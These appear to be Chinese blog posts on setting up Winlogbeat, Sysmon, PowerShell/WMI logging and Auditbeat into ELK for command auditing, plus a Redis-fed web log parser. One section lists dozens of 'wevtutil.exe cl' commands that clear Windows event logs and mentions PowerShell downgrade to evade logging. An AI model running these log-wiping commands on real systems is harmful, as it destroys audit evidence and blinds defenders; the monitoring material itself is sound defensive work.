rpm -ivh logstash-6.4.2.rpm
cd /usr/share/logstash
ln -s /etc/logstash ./config

1.windows系统

暂时针对的是win7及其以上的系统才方便使用,主要的是方便升级powershell。有点奇葩的是需要系统是正版,如果不是请自行激活。相关的记录参照针对windows下命令记录的种种

这里的监控主要是开启了各种命令执行记录放进事件文件中,然后利用winlogbeat对相关文件进行监控。然后安装Winlogbeat服务

PS C:\Users\Administrator> cd 'C:\Program Files\Winlogbeat'
PS C:\Program Files\Winlogbeat> .\install-service-winlogbeat.ps1

Security warning
Run only scripts that you trust. While scripts from the internet can be useful,
this script can potentially harm your computer. If you trust this script, use
the Unblock-File cmdlet to allow the script to run without this warning message.
Do you want to run C:\Program Files\Winlogbeat\install-service-winlogbeat.ps1?
[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): R

Status   Name               DisplayName
------   ----               -----------
Stopped  winlogbeat         winlogbeat

相关的配置文件winlogbeat.yml

###################### Winlogbeat Configuration Example ##########################

# This file is an example configuration file highlighting only the most common
# options. The winlogbeat.full.yml file from the same directory contains all the
# supported options with more comments. You can use it as a reference.
#
# You can find the full configuration reference here:
# https://www.elastic.co/guide/en/beats/winlogbeat/index.html

#======================= Winlogbeat specific options ==========================

# event_logs specifies a list of event logs to monitor as well as any
# accompanying options. The YAML data type of event_logs is a list of
# dictionaries.
#
# The supported keys are name (required), tags, fields, fields_under_root,
# forwarded, ignore_older, level, event_id, provider, and include_xml. Please
# visit the documentation for the complete details of each option.
# https://go.es.io/WinlogbeatConfig

winlogbeat.event_logs:
  - name: Application
    ignore_older: 72h
    fields:
      log_type: windowsevt
  - name: Security
    fields:
      log_type: windowsevt
  - name: System
    fields:
      log_type: windowsevt
  - name: Windows PowerShell
    fields:
      log_type: windowsevt
  - name: Microsoft-Windows-PowerShell/Operational
    fields:
      log_type: windowsevt
  - name: Microsoft-Windows-WMI-Activity/Operational
    fields:
      log_type: windowsevt
  - name: Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational
    fields:
      log_type: windowsevt
  - name: Microsoft-Windows-Sysmon/Operational
    fields:
      log_type: windowsevt 
#================================ General =====================================

# The name of the shipper that publishes the network data. It can be used to group
# all the transactions sent by a single shipper in the web interface.
#name:

# The tags of the shipper are included in their own field with each
# transaction published.
#tags: ["service-X", "web-tier"]

# Optional fields that you can specify to add additional information to the
# output.
#fields:
#  env: staging

#================================ Outputs =====================================

# Configure what outputs to use when sending the data collected by the beat.
# Multiple outputs may be used.

#-------------------------- Elasticsearch output ------------------------------
# output.elasticsearch:
#   # Array of hosts to connect to.

  # Optional protocol and basic auth credentials.
  # protocol: "http"
#----------------------------- Logstash output --------------------------------
output.logstash:
  #The Logstash hosts
  hosts: ["localhost:5044"]

  # Optional SSL. By default is off.
  # List of root certificates for HTTPS server verifications
  #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"]

  # Certificate for SSL client authentication
  #ssl.certificate: "/etc/pki/client/cert.pem"

  # Client Certificate Key
  #ssl.key: "/etc/pki/client/cert.key"

#================================ Logging =====================================
# Sets log level. The default log level is info.
# Available log levels are: critical, error, warning, info, debug
#logging.level: debug

# At debug level, you can selectively enable logging only for some components.
# To enable all selectors use ["*"]. Examples of other selectors are "beat",
# "publish", "service".
#logging.selectors: ["*"]
logging.to_files: true
logging.files: 
  path: C:/ProgramData/winlogbeat/Logs
logging.level: info

再启动winlogbeat服务

net start winlogbeat

需要修改output.logstash:中的host为相关安装elk的机器。同时该机器的logstash的配置如下

input {
  beats {
    port => 5044
    host => "0.0.0.0"
  }
}

filter {

if ([fields][log_type] == "windowsevt") {

mutate {
 add_field => { "[orig_message]" => "%{message}" }
 }

#substitute some fields
 mutate {
 gsub => [
 "message", "\r\n", " ",
 "message", "\n", " " 
 ] 
 }

#Filter the message field of events 403 and 400
 if ([event_id] == 403 or [event_id] == 400) {
 grok {
 match => { "message" => "%{GREEDYDATA:[event_data][msg]}\sDetails:\s*NewEngineState\s*=\s*%{GREEDYDATA:[event_data][details][newenginewtate]}\s*PreviousEngineState\s*=\s*%{GREEDYDATA:[event_data][details][previousengineState]}\s*SequenceNumber\s*=\s*%{INT:[event_data][details][sequencenumber]}\s*HostName\s*=\s*%{GREEDYDATA:[event_data][details][hostname]}\s*Host\s*Version\s*=\s*%{GREEDYDATA:[event_data][details][hostversion]}\s*Host\s*Id\s*=\s*%{GREEDYDATA:[event_data][details][hostid]}\s*Host\s*Application\s*=\s*%{GREEDYDATA:[event_data][details]hostapplication]}\s*Engine\s*Version\s*=\s*%{GREEDYDATA:[event_data][details][engineversion]}\s*Runspace\s*Id\s*=\s*%{GREEDYDATA:[event_data][details][runspaceid]}\s*Pipeline\s*Id\s*=\s*%{GREEDYDATA:[event_data][details][pipelineid]}\s*Command\s*Name\s*=\s*%{GREEDYDATA:[event_data][details][commandname]}\s*Command\s*Type\s*=\s*%{GREEDYDATA:[event_data][details][commandtype]}\s*Script\s*Name\s*=\s*%{GREEDYDATA:[event_data][details][scriptmname]}\s*Command\s*Path\s*=\s*%{GREEDYDATA:[event_data][details][commandpath]}\s*Command\s*Line\s*=\s*%{GREEDYDATA:[event_data][details][commandline]}" }
 } 
 }
 #Filter the message field of event 600
 if ([event_id] == 600) {
 grok {
 match => { "message" => "%{GREEDYDATA:[event_data][msg]}\sDetails:\s*ProviderName\s*=\s*%{GREEDYDATA:[event_data][details][providername]}\s*NewProviderState\s*=\s*%{GREEDYDATA:[event_data][details][newproviderstate]}\s*SequenceNumber\s*=\s*%{INT:[event_data][details][sequencenumber]}\s*HostName\s*=\s*%{GREEDYDATA:[event_data][details][hostname]}\s*Host\s*Version\s*=\s*%{GREEDYDATA:[event_data][details][hostversion]}\s*Host\s*Id\s*=\s*%{GREEDYDATA:[event_data][details][hostid]}\s*Host\s*Application\s*=\s*%{GREEDYDATA:[event_data][details]hostapplication]}\s*Engine\s*Version\s*=\s*%{GREEDYDATA:[event_data][details][engineversion]}\s*Runspace\s*Id\s*=\s*%{GREEDYDATA:[event_data][details][runspaceid]}\s*Pipeline\s*Id\s*=\s*%{GREEDYDATA:[event_data][details][pipelineid]}\s*Command\s*Name\s*=\s*%{GREEDYDATA:[event_data][details][commandname]}\s*Command\s*Type\s*=\s*%{GREEDYDATA:[event_data][details][commandtype]}\s*Script\s*Name\s*=\s*%{GREEDYDATA:[event_data][details][scriptmname]}\s*Command\s*Path\s*=\s*%{GREEDYDATA:[event_data][details][commandpath]}\s*Command\s*Line\s*=\s*%{GREEDYDATA:[event_data][details][commandline]}" }
 } 
 }

#standartize the IP address field
 if ([event_data][IPString]) {
 mutate {
 rename => { "[event_data][IPString]" => "[remote_ip]" }
 }
 }

#standartize the IP address field
 if ([event_data][ClientAddress]) {
 mutate {
 rename => { "[event_data][ClientAddress]" => "[remote_ip]" }
 }
 }
 #standartize the IP address field
 if ([event_data][IpAddress]) {
 grok {
 match => { "[event_data][IpAddress]" => "%{IPV4:[remote_ip]}" }
 }

}

#Split Remote IP and Port 
 if ([event_data][ClientIP]) {
 mutate {
 split => ["[event_data][ClientIP]" , ":"]
 add_field => { "[remote_ip]" => "%{[event_data][ClientIP][0]}" }
 add_field => { "[port]" => "%{[event_data][ClientIP][1]}" }
 remove_field => [ "[event_data][ClientIP]" ]
 }
 }

#add GeoIP
 geoip {
 source => "[remote_ip]]"
 target => "[geoip]"
 }
}
}

output {
  elasticsearch {
    hosts => ["127.0.0.1:9200"]
    index => "windowsevt-%{+YYYY.MM.dd}"
    manage_template => false
  }
  stdout { codec => rubydebug }
}

当然也可以精简为

input {
  beats {
    port => 5044
    host => "0.0.0.0"
  }
}


output {
  elasticsearch {
    hosts => ["127.0.0.1:9200"]
    index => "auditbeat-%{+YYYY.MM.dd}"
    manage_template => false
  }
  stdout { codec => rubydebug }
}

启动logstash

./bin/logstash -f config/conf.d/winevtx.conf

同时该机器需要打开防火墙开放5044端口给相关的机器。到kibana新建索引

测试执行wmi


非常规应用

缺点也是非常明显,一旦停止了sysmon和winlogbeat,就无法继续采集到信息了。

2.linux系统

开始准备使用Audit来实现,后来发现elastic发现一个神奇的玩意Auditbeat。发现网上大多数都是直接写入es或者kibana。直接写入logstash的好像很少。记录一下

https://artifacts.elastic.co/downloads/beats/auditbeat/auditbeat-6.5.2-x86_64.rpm
rpm -ivh auditbeat-6.5.2-x86_64.rpm
sudo chkconfig --add auditbeat
#修改/etc/auditbeat/auditbeat.yml
mv /etc/auditbeat/auditbeat.yml /etc/auditbeat/auditbeat.yml_bak
wget http://0cx.cc/ps/auditbeat.yml -O /etc/auditbeat/auditbeat.yml

值得需要修改的地方

- module: file_integrity
  paths:

如果需要新增监控的目录就继续写 - path。这里的path需要的是绝对路径,另外一个地方是output.logstash。修改为自己elk的机器。集合之前写的bash执行命令监控,可以持续监控。保存后重启auditbeat

service auditbeat restart

logstash建立监控配置

vim auditbeat.conf
input {
  beats {
    port => 5045
    host => "0.0.0.0"
  }
}


output {
  elasticsearch {
    hosts => ["127.0.0.1:9200"]
    index => "auditbeat-%{+YYYY.MM.dd}"
    manage_template => false
  }
  stdout { codec => rubydebug }
}

同样的在主机上修改防火墙打开对应的5045端口。然后在kibana新建索引即可。但是这里有个坑爹的地方,需要在相关的机器上修改对应的机器名.linux默认机器名都是localhost.localdomain

缺点也是非常明显,一旦停止了auditbeat服务以后就gg了,还有就是SYSMON会在某个时候突然占用大量的CPU.这个问题不是很好解决

参考

https://github.com/margusmaki/ELK
https://raw.githubusercontent.com/Mosuan/AuditdPy/master/docs/rule.txt

针对windows下命令记录的种种

发布时间:December 2, 2018 // 分类:运维工作,开发笔记,工作日志,windows // No Comments

处于客户的某种需求需要对windows系统进行进程监控,想了几个办法,但是走了一些弯路,不过好在还是实现了

最开始想到的是hook,后记录cmd命令,后来小伙伴提示不仅仅是cmd命令。还有其他的进程信息。这类例举了一些可以依赖于系统实现和记住第三方实现的方式

1. 系统自带的gpedit.msc

实际上,在win10、win8、win2012、win2016上面,是可以手动开启4688进程记录的,并且记录详细的命令信息。开启方法如下。
打开gpedit.msc
计算机配置 > 策略 > Windows 设置 > 安全设置 > 高级审核配置 > 详细跟踪>审核创建进程

然后到
管理 模板\系统\审核创建的进程\在创建事件的过程中包含命令行

2. 借助工具sysmon可以实现

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

Sysmon.exe -accepteula -i -l -n
Sysmon64.exe -accepteula -i -l -n

与此执行相关联的标志是:

-l:记录模块的加载。(可选)列出要跟踪的进程列表
-i: 安装服务和驱动程序。(可选)获取配置文件。
-n: 记录网络连接。(可选)列出要跟踪的进程列表。
只需键入以下命令即可查看配置: Sysmon -c

安装好以后会在%SystemRoot%\System32\Winevt\Logs\出现Microsoft-Windows-Sysmon%4Operational.evtx

此外,Sysmon还允许我们创建可自定义的配置文件,允许我们根据系统上发生的某些活动创建Windows事件日志记录。例如,您可以通过监视进程wmiprvse.exe来告诉Sysmon开始监视与WMI命令执行相关的活动。配置文件格式全部采用XML格式,因此您可以自行定制。如果您不想出于任何原因自定义XML文件,则可以从此Github资源sysmon配置下载Sysmon的特定配置文件列表 。下载任何配置文件后,只需将它们与-c标志一起运行,如下例所示

Sysmon64.exe -c c:\Scripts\Sysmon\scripts\T0000_wmic_remote.xml -l -n 
Sysmon64.exe -c c:\Scripts\Sysmon\scripts\T1138_appcompat.xml -l -

给出一个配置文件例子

<Sysmon schemaversion="3.4">
 <!-- Capture all hashes -->
 <HashAlgorithms>*</HashAlgorithms>
 <EventFiltering>
 <!-- Event ID 1 == Process Creation. -->
 <ProcessCreate onmatch="include">
 <ParentImage condition="end with">wmiprvse.exe</ParentImage>
 <ParentImage condition="contains">cmd.exe</ParentImage>
 <ParentImage condition="contains">wscript.exe</ParentImage>
 <ParentImage condition="contains">svchost.exe</ParentImage>
 <ParentImage condition="contains">powershell.exe</ParentImage>
 <ParentImage condition="contains">mshta.exe</ParentImage>
 <ParentImage condition="contains">office</ParentImage>
 <Image condition="end with">cscript.exe</Image>
 <Image condition="end with">wscript.exe</Image>
 <Image condition="end with">cmd.exe</Image>
 <Image condition="end with">powershell.exe</Image>
 <Image condition="end with">sh.exe</Image>
 <Image condition="end with">bash.exe</Image>
 <Image condition="end with">scrcons.exe</Image>
 <Image condition="end with">regsvr32.exe</Image> 
 <Image condition="end with">hh.exe</Image> 
 </ProcessCreate>
 <!-- Event ID 2 == File Creation Time. -->
 <FileCreateTime onmatch="include"/>
 <!-- Event ID 3 == Network Connection. -->
 <NetworkConnect onmatch="include"/>
 <!-- Event ID 5 == Process Terminated. -->
 <ProcessTerminate onmatch="include"/>
 <!-- Event ID 6 == Driver Loaded. -->
 <DriverLoad onmatch="include"/>
 <!-- Event ID 7 == Image Loaded. -->
 <ImageLoad onmatch="include"/>
 <!-- Event ID 8 == CreateRemoteThread. -->
 <CreateRemoteThread onmatch="include"/>
 <!-- Event ID 9 == RawAccessRead. -->
 <RawAccessRead onmatch="include"/>
 <!-- Event ID 10 == ProcessAccess. -->
 <ProcessAccess onmatch="include"/>
 <!-- Event ID 11 == FileCreate. -->
 <FileCreate onmatch="include"/>
 <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. -->
 <RegistryEvent onmatch="include"/>
 <!-- Event ID 15 == FileStream Created. -->
 <FileCreateStreamHash onmatch="include" />
 <!-- Event ID 17,18 == PipeEvent. Log Named pipe created & Named pipe connected -->
 <PipeEvent onmatch="include"/>
 <!-- Event ID 19,20,21, == WmiEvent. Log all WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter activity-->
 <WmiEvent onmatch="include"/>
 </EventFiltering>
</Sysmon>

正如您在上面的示例中所看到的,HashAlgorithms中的*(星号)符号 XML只是告诉Sysmon计算已执行进程的所有可能哈希值(即MD5,SHA1,SHA256和IMPHASH)。当您阅读Logstash配置部分时,您将看到如何将这些哈希值拆分到它们自己的字段以及如何在Kibana中创建每个字段的表。好吧,在流程创建部分,您可以设置流程名称的触发器,包括设置父子流程,每个触发器的条件等。Sysmon还允许您为网络连接生成其他事件,加载驱动程序并继续列表。我建议您在其他在线资源中阅读Sysmon,以便掌握Sysmon的全部功能。其中一些资源在本文末尾的参考部分中提到。

3. 开启powershell记录

可以借助wevtutil来实现

wevtutil Set-Log "Microsoft-Windows-PowerShell/Analytic" /q:true /e:true

PowerShell v3/v4 全面的日志记录

借助对 Windows 事件跟踪 (ETW) 日志、模块中可编辑的 LogPipelineExecutionDetails属性和“打开模块日志记录”组策略设置的支持,Windows PowerShell 3.0 改进了对命令和模块的日志记录和跟踪支持。 自PowerShell v3版本以后支持启用PowerShell模块日志记录功能,并将此类日志归属到了4103事件。最新的PowerShell v5 提供反混淆功能
启用脚本块日志可以以管理员权限运行PowerShell v5,并运行以下命令即可:

Install-Module -Name scriptblocklogginganalyzer -Scope CurrentUser
set-SBLLogSize -MaxSizeMB 1000
Enalbe-SBL

或者通过GPO启用PowerShell脚本块日志记录功能并记录脚本文件的调用信息:
计算机配置\策略\管理模板\ Windows组件\ Windows PowerShell
先启用模块日志记录


再打开powershell脚本块日志记录

当然也可以通过修改以下注册表选项来开启:

HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging → EnableScriptBlockLogging = 1

查看powershell事件记录id4103可以看到具体执行的命令


同时sysmon也检测到了

PowerShell 5.0支持Windows 7/2008 R2及更高版本的操作系统。虽然PowerShell 5.0的许多增强日志记录功能都被反向移植到4.0版,但还是建议在所有Windows平台上安装PowerShell 5.0。 PowerShell 5.0包含4.0中未提供的功能,包括可疑的脚本块日志记录。

对策就是需要使用powershell攻击的话,采用降级powershell最靠谱的方式

win7升级powershell
https://docs.microsoft.com/en-us/powershell/wmf/overview

下载适合的版本,打补丁的时候如果失败可以考虑退出杀软

4. 开启wmi记录

fireeye的大佬写了一个来记录
https://github.com/realparisi/WMI_Monitor
使用方式

Import-Module .\WMIMonitor.ps1
New-EventSubscriberMonitor 


日志记录在应用程序中,以wsh事件id为8的事件


注意:在使用脚本之前,必须以管理员身份运行PowerShell。该脚本需要PowerShell版本3或更高版本(最新版本为5),并将作为两个单独的PowerShell函数在其当前状态下运行。


参考
https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html
https://mp.weixin.qq.com/s/mhwLrXlxz8LzoieWsstGvQ
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

PS

如果把这些进程传递到某一集中中心,加上端口,服务,文件等等。再把文件和进程以及端口丢到ioc,再加上某些特征。是不是又是一个新的态势

BUt清理日志有wevtutil.exe 。以及大佬的技巧渗透技巧-Windows单条日志的删除

wevtutil.exe cl "ACEEventLog"
wevtutil.exe cl "Application"
wevtutil.exe cl "HardwareEvents"
wevtutil.exe cl "Internet Explorer"
wevtutil.exe cl "Key Management Service"
wevtutil.exe cl "Media Center"
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
wevtutil.exe cl "Microsoft-Windows-Backup"
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
wevtutil.exe cl "Microsoft-Windows-International/Operational"
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"
wevtutil.exe cl "ODiag"
wevtutil.exe cl "OSession"
wevtutil.exe cl "Security"
wevtutil.exe cl "Setup"
wevtutil.exe cl "System"
wevtutil.exe cl "Windows PowerShell"

最好的方法还是集中化啊。比如利用beat对系统进行监控

利用RELK进行日志收集

发布时间:April 3, 2018 // 分类:运维工作,开发笔记,python // No Comments

前不久在做应急的总是遇到要求对日志进行分析溯源,当时就想到如果对常见的日志类进行解析后统一入库处理,然后在对相关的IP/URL进行统计归纳。对于溯源之类的很是方便。想到数据量比较大,又要便于分析,就想到了ELK.

搭建一套基于elk的日志分析系统。
系统centos 内存4G 双核

大概架构如此

1.elk搭建

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.4.2.rpm
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.4.2-x86_64.rpm
wget https://artifacts.elastic.co/downloads/logstash/logstash-6.4.2.rpm

rpm -ivh elasticsearch-6.4.2.rpm 
sudo chkconfig --add elasticsearch
/etc/init.d/elasticsearch start

rpm -ivh kibana-6.4.2-x86_64.rpm 
/etc/init.d/kibana start
sudo chkconfig --add kibana

rpm -ivh logstash-6.4.2.rpm
cd /usr/share/logstash
ln -s /etc/logstash ./config

整个elk系统搭建好了,安装redis作为agent收集日志来作为logstash的输入源

wget http://download.redis.io/redis-stable.tar.gz
tar zxf redis-stable.tar.gz 
cd redis-stable
make && make install

修改redis.conf。

bind 0.0.0.0
protected-mode no
daemonize yes
maxclients 1000000

启动redis

sudo redis.conf /etc/
redis-server /etc/redis.conf

Logstash配置文件是JSON格式,放在/etc/logstash/conf.d 。 该配置由三个部分组成:输入,过滤器和输出。

input 数据输入端,可以接收来自任何地方的源数据。
file:从文件中读取
syslog:监听在514端口的系统日志信息,并解析成RFC3164格式。
redis:从redis-server list 中获取
beat:接收来自Filebeat的事件
Filter 数据中转层,主要进行格式处理,数据类型转换、数据过滤、字段添加,修改等,常用的过滤器如下。
grok: 通过正则解析和结构化任何文本。Grok 目前是logstash最好的方式对非结构化日志数据解析成结构化和可查询化。logstash内置了120个匹配模式,满足大部分需求。
mutate: 在事件字段执行一般的转换。可以重命名、删除、替换和修改事件字段。
drop: 完全丢弃事件,如debug事件。
clone: 复制事件,可能添加或者删除字段。
geoip: 添加有关IP地址地理位置信息。
output 是logstash工作的最后一个阶段,负责将数据输出到指定位置,兼容大多数应用,常用的有:
elasticsearch: 发送事件数据到 Elasticsearch,便于查询,分析,绘图。
file: 将事件数据写入到磁盘文件上。
mongodb:将事件数据发送至高性能NoSQL mongodb,便于永久存储,查询,分析,大数据分片。
redis:将数据发送至redis-server,常用于中间层暂时缓存。
graphite: 发送事件数据到graphite。http://graphite.wikidot.com/
statsd: 发送事件数据到 statsd。

编写logstash的配置文件。对所有的数据全盘接受,感谢Mosuan师傅的指导。

input {    
    redis {
        host => '127.0.0.1'
    port => 6379
        password => 'password'
        data_type => 'list'
        key => 'logstash:redis'
    }
}
output {
    elasticsearch { hosts => localhost }
    stdout { codec => rubydebug }
}

Logpara

一个对常见的web日志进行解析处理的粗糙DEMO。

Python 2.7 License

目标

  • 对被请求的URL进行解析,解析出是否常见的攻击方式
  • 对来访的IP进行深度解析,包含经纬度,物理地址
  • 对来访的UA进行深度解析,解析出设备,浏览器种类,是否爬虫
  • 把全部的日志解析了入库,做RELK处理

TO DO

  • 对入库elasticsearch的日志进行处理并展示

Useage

  • 使用之前先修改common/units.py

    redis_host = '192.168.87.222'
    redis_port = 6379
    redis_pass = 'cft67ygv'
    redis_db = 0
    redis_key = 'logstash:redis'
    
  • 使用
Usage: main.py --type IIS|Apache|Tomcat|Nginx --file file|directory

log parser

Options:
  -h, --help   show this help message and exit
  --type=TYPE  chose which log type
  --file=FILE  chose file or directory

脚本地址:https://github.com/0xa-saline/Logpara

导入后的结果类似


单个查看

如果基于nginx还可以收集post数据,在溯源取证以及日志分析都是有很好的帮助。

Bash通配符在命令执行中的应用

发布时间:February 25, 2018 // 分类:运维工作,linux // No Comments

